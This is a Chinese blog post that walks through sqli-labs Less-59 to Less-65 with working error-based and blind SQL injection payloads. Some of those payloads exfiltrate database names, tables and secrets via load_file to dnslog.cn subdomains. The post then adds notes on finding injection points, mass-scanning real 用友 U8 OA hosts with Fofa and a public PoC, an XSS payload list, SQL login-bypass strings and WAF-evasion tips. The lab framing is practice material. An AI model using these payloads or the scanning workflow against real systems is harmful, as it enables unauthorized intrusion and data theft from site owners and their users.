2 and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) --+
在这里插入图片描述

secret_OLE6

f.获取表内数据

2 and updatexml(1, concat(0x7e,(select secret_OLE6 from qi7pnhikpv where id = 1),0x7e), 0x7e) --+
在这里插入图片描述在这里插入图片描述

2229WftWHjdVjMEaS6yr9O3a

21.Less-60

a.注入点判断

双引号报错注入,但是需要括号闭合

b.轮子测试

3") and 1 --+
在这里插入图片描述

c.获取数据库名称

3") and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
在这里插入图片描述

d.获取表名

3") and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) --+
在这里插入图片描述

hofp86ahow

e.获取列名

3") and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) --+
在这里插入图片描述

secret_NAX1

f.获取表内数据

3") and updatexml(1, concat(0x7e,(select secret_NAX1 from hofp86ahow where id = 1),0x7e), 0x7e) --+
在这里插入图片描述在这里插入图片描述

0CxW5gDfT4RrJWkO371mJwmU

22.Less-61

a.注入点判断

单引号报错注入,但是需要双括号闭合

b.轮子测试

3’)) and 1 --+

c.获取数据库名称

3’)) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
在这里插入图片描述

d.获取表名

3’)) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) --+
在这里插入图片描述

jy0p59437z

e.获取列名

3’)) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) --+
在这里插入图片描述

secret_AX65

f.获取表内数据

3’)) and updatexml(1, concat(0x7e,(select secret_AX65 from jy0p59437z where id = 1),0x7e), 0x7e) --+
在这里插入图片描述在这里插入图片描述

zJn62X2QZ1xqyyJLUdkCeqEu

23.Less-62

a.注入点判断

单引号盲注

b.轮子测试

3’) and if(1=1,sleep(1),0) and (1) --+
在这里插入图片描述

延迟1秒,另外盲注不需要看显示,报错和联合注入才需要,只看延迟就行

c.获取数据库名称

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述

d.获取表名

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述

06pq63s5ri

e.获取列名

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述

secret_KXH7

f.获取表内数据

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_KXH7 from 06pq63s5ri where id=1),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述在这里插入图片描述

eyhWTtqVrtmuDFdoYsQHfs6W

24.Less-63

a.注入点判断

还是单引号盲注,估计还是需要判断闭合

b.轮子测试

3’ and if(1=1,sleep(1),0) and (1) --+
在这里插入图片描述

居然不用考虑闭合

c.获取数据库名称

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述

d.获取表名

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述

62ru7lcvyu

e.获取列名

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述

secret_VS47

f.获取表内数据

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_VS47 from 62ru7lcvyu where id=1),‘.vsc4qg.dnslog.cn\abc’))) --+
在这里插入图片描述在这里插入图片描述

TZPD8yDonwQ22CubAiL57IAB

25.Less-64

a.注入点判断

除了输入正确的数字有显示,如果再输入其他符号或字母一概不显示

b.轮子测试

1 and(1)

c.获取数据库名称

1 and(select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’)))
在这里插入图片描述

d.获取表名

1 and(select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.4kmw9o.dnslog.cn\abc’)))
在这里插入图片描述

Uonkinbilw

e.获取列名

1 and(select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.4kmw9o.dnslog.cn\abc’)))
在这里插入图片描述

secret_ZGTB

f.获取表内数据

1 and(select load_file(concat(‘\\’,(select secret_ZGTB from Uonkinbilw where id=1),‘.4kmw9o.dnslog.cn\abc’)))
在这里插入图片描述

XYCNXPpkAXJX8UkwpGurdGZL
在这里插入图片描述

26.Less-65

终于到最后一关了,大结局,然后就可以去实战了

a.注入点判断

双引号盲注

b.轮子测试

1" and if(1=1, sleep(1),0) and(1) and "
在这里插入图片描述

有延迟,if(1=1, sleep(1),0)只是用于判断闭合,实际使用时去掉就行
1" and (1) and "

c.获取数据库名称

1" and (select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’))) and "
在这里插入图片描述

d.获取表名

1" and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.4kmw9o.dnslog.cn\abc’))) and "
在这里插入图片描述

cbkyy6a08r

e.获取列名

1" and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.4kmw9o.dnslog.cn\abc’))) and "
在这里插入图片描述

secret_RHAB

f.获取表内数据

1" and (select load_file(concat(‘\\’,(select secret_RHAB from cbkyy6a08r where id=1),‘.4kmw9o.dnslog.cn\abc’))) and "
在这里插入图片描述

0r0KwIgn3d1KwEGu1FL3N596

在这里插入图片描述

三、笔记

挖掘注入点
谷歌语法:inurl:“?id=”
判断ID是否为数字,可直接在参数值后面加/1 /0,若为数字加/0将报错
若确认是数字,可继续构造poc,如1/if(1,1,0) 1/if(0,1,0)
若使用1/if(1=1,1,0) 或1/if(1 like 1,1,0) 出现永恒之白,可使用1/if(1.=1,1,0) 1/if(1.=2,1,0)等继续进行测试
还可使用1/if(1.=ascii(2) ,1,0) 1/if(1.=hex(2) ,1,0) 1/if(1.=hex(schema()) ,1,0)
如果单引号被过滤,可使用 ‘xxx’ like ‘xx%’
如果截取函数substr及mid被过滤,可考虑left,right 1/if(68.hex(left(schema(),1)),1,0)(68用爆破得出)
获得第一个字母之后可以继续获取后面的字母1/if(6864.like+hex(left(schema(),2)),1,0)
if若过滤可使用case when替代

sql注入判断是否有注入的方法
除了使用单引号双引号之外还可以使用,1/2 1/1 1/0判断是否有注入
通过1 and 1=1 --+与 1 and 1=2 --+观察是否有变化后使用盲注

首先选择要挖什么漏洞
比如用友 U8 OA SQL注入漏洞
至于想找什么漏洞信息可去漏洞库找找,如
https://wiki.bylibrary.cn/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/ActiveMQ/ActiveMQ%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/
信息收集阶段我们的主要目标是:
1、找到网上公开的漏洞POC
比如POC:
http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
2、使用找出可能存在该漏洞的IP列表
比如可以用Fofa语句:title=“用友U8-OA”,
可以使用Github开源工具Fofa-collect批量导入列表验证
POC批量验证的脚本在PeiQi文库的POC基础上进一步改写,支持批量导入IP.txt,并导出存在漏洞的URL,保存为urls.txt。
接着使用批量IP反查域名,这时候我们只需要去访问域名,就可以知道这个IP对应的公司。于是我们就可以拿着这些信息去提交漏洞了!
再次强调渗透测试点到为止,提交漏洞只需要跑出数据库名证明漏洞存在,信息安全三要素CIA时刻铭记于心
在拿到新的POC时,仅需替换POC_1()函数,代码稍加改动,就可以实现另一个漏洞的批量挖掘。

四、信息收集常用端口

http://duankou.wlphp.com/
文件共享服务端口
21,22,69,2049.139.389
远程连接服务端口
23,3389.5900,5632
Web应用服务端口
80.443.8080,8089,7001,7002,9090,4848,1352,10000
数据库服务端口
3306,1433,1521,5432,27017,27018,6379,5000
邮件服务端口
25,110,143
网络常见协议端口
53,67,68,161
特殊服务端口
2128,8068,9200,9300,11211,512,513,514,873,3690,50000

21,22,69,2049.139.389,23,3389.5900,5632,80.443.8080,8089,7001,7002,9090,4848,1352,10000,3306,1433,1521,5432,27017,27018,6379,5000,25,110,143,53,67,68,161,2128,8068,9200,9300,11211,512,513,514,873,3690,50000

五、常用测试xss

<script>console%2elog(299792458)%3c<%2fscript>
"><script>console.log(299792458)<%2fscript><"
'><script>console.log(299792458)<%2fscript>
'><script>console.log(299792458)<%2fscript><'
"""><SCRIPT>console.log("xss test")
'''><SCRIPT>console.log("xss test")'
<SCRIPT>console.log(299792458)%3b<%2fSCRIPT>
<<SCRIPT>console.log("xss test")//<</SCRIPT>
<<SCRIPT>console.log(299792458)%2f%2f<<%2fSCRIPT>
<<SCRIPT>console.log(299792458)%2f%2f<<%2fSCRIPT><img src%3d"1" onerror%3d"console.log(299792458)">
<img src%3d'1' onerror%3d'console.log(299792458)'
<IMG """><SCRIPT>console.log(299792458)<%2fSCRIPT>">
<IMG '''><SCRIPT>console.log(299792458)<%2fSCRIPT>'>未成功
<scri<scr<script>ipt>pt>confirm(299792458)%3b<%2fscr<%2fsc<%2fscript>ript>ipt>
<scri<scr<script>ipt>pt>console.log(299792458)%3b<%2fscr<%2fsc<%2fscript>ript>ipt>
<SCRI<script>PT>console.log(299792458)%3b<%2fSCR<%2fscript>IPT>
<scri<script>pt>console.log(299792458)%3b<%2fscr<%2fscript>ipt>
console.log(299792458)%3b
%3bconsole.log(299792458)%3b
'%3bconsole.log(299792458)%3b'
"%3bconsole.log(299792458)%3b"
\"%3bconsole.log(299792458)%3b%2f%2f
<SCR%00IPT>console.log(299792458)<%2fSCR%00IPT>
<SCR%2500IPT>console.log("xss test")</SCR%2500IPT>
<STYLE TYPE%3d"text%2fjavascript">console.log(299792458)%3b<%2fSTYLE>
"onmouseover%3dconsole.log(299792458)%20
"onmouseout%3dconsole.log(299792458)%20
"onmousemove%3dconsole.log(299792458)%20
" οnmοuseοver="console.log(/xss test/)
' οnmοuseοver='console.log(/xss test/)
' οnclick='console.log("xss test")
onload%3d'console.log(299792458)'
onload%3d"console.log(299792458)"
onerror%3d'console.log(299792458)'
onerror%3d"console.log(299792458)"
<IFRAME SRC%3d'f' onerror%3d'console.log(299792458)'><%2fIFRAME>
<IFRAME SRC%3d'f' onerror%3d"console.log(299792458)"><%2fIFRAME>
<IFRAME SRC%3d'f' onerror%3d'console.log("xss test")'></IFRAME>
'''><SCRIPT>console.log(299792458)'
"""><SCRIPT>console.log(299792458)
oonnfocus=javascripscriptt:console.log('xss test')
" oonnfocus=javascriscriptpt:console.log('xss test')>
"><a href=javascript:console.log('xss test')>xss test</a>

六、SQL注入万能密码

1‘ or 1=1–+
1‘or’1’=‘1
“or"a”="a
')or(‘a’='a
")or(“a”="a
‘or 1=1–
“or 1=1–
'or”=’
'or 1=1%00
'or 1=1/
admin’ or 1=1/*

七、本次攻防演练中得到的几点经验

1、首先用wafw00f-master看网站有没有开WAF,有WAF的情况下就不要去做目录扫描了,本人试过,百分百会被封IP
2、如果开启了WAF的情况下可以使用fofa用以下方法扫敏感信息
domain=“yimazhineng.cn” && (host=“.admin.php” || title=“后台” || body=“管理” || body=“用户名” || body=“密码” || body=“身份证号” || body=“手机号” || body=“注册” || body=“登录”|| body=“改密码”)
3、使用https://whatcms.org/检测网站是不是用了CMS,以及CMS版本号,据此可以到网上找对应版本的历史漏洞找教程进行渗透

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/84190.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

idea使用protobuf

本文参考&#xff1a;https://blog.csdn.net/m0_37695902/article/details/129438549 再次感谢分享 什么是 protobuf &#xff1f; Protocal Buffers(简称protobuf)是谷歌的一项技术&#xff0c;用于结构化的数据序列化、反序列化。 由于protobuf是跨语言的&#xff0c;所以用…

【数理知识】求刚体旋转矩阵和平移矩阵,已知 N>=3 个点在前后时刻的坐标,且这 N>=3 点间距离始终不变代表一个刚体

序号内容1【数理知识】自由度 degree of freedom 及自由度的计算方法2【数理知识】刚体 rigid body 及刚体的运动3【数理知识】刚体基本运动&#xff0c;平动&#xff0c;转动4【数理知识】向量数乘&#xff0c;内积&#xff0c;外积&#xff0c;matlab代码实现5【数理知识】协…

【Spring Boot】Thymeleaf模板引擎 — Thymeleaf的高级用法

Thymeleaf的高级用法 主要介绍Thymeleaf的内联、内置对象、内置变量等高级用法。 1.内联 虽然通过Thymeleaf中的标签属性已经几乎满足了开发中的所有需求&#xff0c;但是有些情况下需要在CSS或JS中访问后台返回的数据。所以Thymeleaf提供了th:inline"text/javascript/…

spring boot策略模式实用: 告警模块为例

spring boot策略模式实用: 告警模块 0 涉及知识点 策略模式, 模板方法, 代理, 多态, 反射 1 需求概括 场景: 每隔一段时间, 会获取设备运行数据, 如通过温湿度计获取到当前环境温湿度;需求: 对获取回来的进行分析, 超过配置的阈值需要产生对应的告警 2 方案设计 告警的类…

vuejs 设计与实现 - 双端diff算法

我们介绍了简单 Diff 算法的实现原理。简单 Diff 算法利用虚拟节点的 key 属性&#xff0c;尽可能地复用 DOM元素&#xff0c;并通过移动 DOM的方式来完成更新&#xff0c;从而减少不断地创建和销毁 DOM 元素带来的性能开销。但是&#xff0c;简单 Diff 算法仍然存在很多缺陷&a…

数据结构——双向链表

双向链表实质上是在单向链表的基础上加上了一个指针指向后面地址 单向链表请参考http://t.csdn.cn/3Gxk9 物理结构 首先我们看一下两种链表的物理结构 我们可以看到&#xff1a;双向在单向基础上加入了一个指向上一个地址的指针&#xff0c;如此操作我们便可以向数组一样操作…

【TypeScript】中关于 { 声明合并 } 的使用及注意事项

概念&#xff1a; 在TS中&#xff0c;如果定义了多个相同命名的函数&#xff0c;接口或者class 类&#xff0c;那么它们会自动合并成一个类型 函数的合并&#xff1a; 前面章节讲解的函数重载就是使用了定义多个函数的类型进行合并&#xff1a; function reverse(x: number):…

树状结构数据,筛选指定数据

问题描述&#xff1a; 应用场景和需求&#xff1a;对一个树状结构的数据&#xff0c;进行CRUD 时&#xff0c;想筛选出 树状结构数据中存在变动的部分。 操作步骤 准备需要的数据&#xff1a; 1.先拿到 你原来的树状结构数据 2.再筛选出 需要保留的数据集合id&#xff0c;也…

【《深入浅出计算机网络》学习笔记】第1章 概述

内容来自b站湖科大教书匠《深入浅出计算机网络》视频和《深入浅出计算机网络》书籍 目录 1.1 信息时代的计算机网络 1.1.1 计算机网络的各类应用 1.1.2 计算机网络带来的负面问题 1.2 因特网概述 1.2.1 网络、互联网与因特网的区别与关系 1.2.1.1 网络 1.2.1.2 互联网 …

Microsoft Message Queuing Denial-of-Service Vulnerability

近期官方公布了一个MSMQ的拒绝服务漏洞&#xff0c;可能因为网络安全设备的更新&#xff0c;影响业务&#xff0c;值得大家关注。 漏洞具体描述参见如下&#xff1a; Name: Microsoft Message Queuing Denial-of-Service Vulnerability Description: Microsoft Message Queuing…

Jenkins持续集成-快速上手

Jenkins持续集成-快速上手 注&#xff1a;Jenkins一般不单独使用&#xff0c;而是需要依赖代码仓库&#xff0c;构建工具等。 搭配组合&#xff1a;GitGitee&#xff08;GitHub、GitLab&#xff09;MavenJenkins 前置准备 常见安装方式&#xff1a; war包Docker容器实例&…

W5100S-EVB-PICO 做TCP Server进行回环测试(六)

前言 上一章我们用W5100S-EVB-PICO开发板做TCP 客户端连接服务器进行数据回环测试&#xff0c;那么本章将用开发板做TCP服务器来进行数据回环测试。 TCP是什么&#xff1f;什么是TCP Server&#xff1f;能干什么&#xff1f; TCP (Transmission Control Protocol) 是一种面向连…

从Spring源码看创建对象的过程

从Spring源码看创建对象的过程 Spring对于程序员set注入的属性叫做属性的填充、对于set注入之后的处理&#xff08;包括BeanPostProcessor的处理、初始化方法的处理&#xff09;叫做初始化。 研读AbstractBeanFactory类中的doGetBean()方法 doGetBean()方法首先完成的工作是…

【Linux操作系统】makefile入门:一个规则-两个函数-三个变量

在Linux中&#xff0c;makefile是一种非常重要的工具&#xff0c;用于自动化构建和管理项目。它可以帮助开发人员轻松地编译和链接程序&#xff0c;同时还可以处理依赖关系和增量构建等问题。在makefile中&#xff0c;我们将重点介绍makefile中的一个规则&#xff0c;两个函数和…

湘大 XTU OJ 1214 A+B IV 题解:数位移动的本质+布尔变量标记+朴素模拟

一、链接 AB IV 二、题目 题目描述 小明喜欢做ab的算术&#xff0c;但是他经常忘记把末位对齐&#xff0c;再进行加&#xff0c;所以&#xff0c;经常会算错。 比如1213&#xff0c;他把12左移了1位&#xff0c;结果变成了133。 小明已经算了一些等式&#xff0c;请计算一下…

harbor搭建

回到目录 Harbor 是 VMware 公司开源的企业级 Docker Registry 项目&#xff0c;其目标是帮助用户迅速搭建一个企业级的 Docker Registry 服务 通俗的讲&#xff0c;harbor是一个私人镜像存储服务器 1 下载安装 进入官网&#xff0c;下载一个离线安装包,harbor官网下载 这…

Vc - Qt - QToolButton

QToolButton 是 Qt 框架中的一个类&#xff0c;是 QPushButton 的子类。它可以显示一个可单击的按钮&#xff0c;并且可以与弹出菜单、图标和文本等进行关联。 QToolButton的一些常见特性和用法包括&#xff1a; 设置文本&#xff1a;使用 setText() 函数设置按钮上的文本。设置…

AES加密(1):AES基础知识和计算过程

从产品代码的安全角度考虑&#xff0c;我们需要对代码、数据进行加密。加密的算法有很多种&#xff0c;基于速度考虑&#xff0c;我们一般使用对称加密算法&#xff0c;其中有一种常见的对称加密算法&#xff1a;AES(Advanced Encryption Standard)。在一些高端的MCU&#xff0…

[虚幻引擎] UE DTBase64 插件说明 使用蓝图对字符串或文件进行Base64加密解密

本插件可以在虚幻引擎中使用蓝图对字符串&#xff0c;字节数组&#xff0c;文件进行Base64的加密和解密。 目录 1. 节点说明 String To Base64 Base64 To String Binary To Base64 Base64 To Binary File To Base64 Base64 To File 2. 案例演示 3. 插件下载 1. 节点说…

普罗米修斯之一实现图形化监控

普罗米修斯之一实现图形化监控 1&#xff1a;prometheus1. 下载&#xff1a;2. 安装&#xff1a;3. 启动&#xff1a;1&#xff1a;启动方式之一加入systemctl2&#xff1a;启动方式之二---直接启动3&#xff1a;启动方式之三----后台运行 4&#xff1a;默认配置文件prometheus…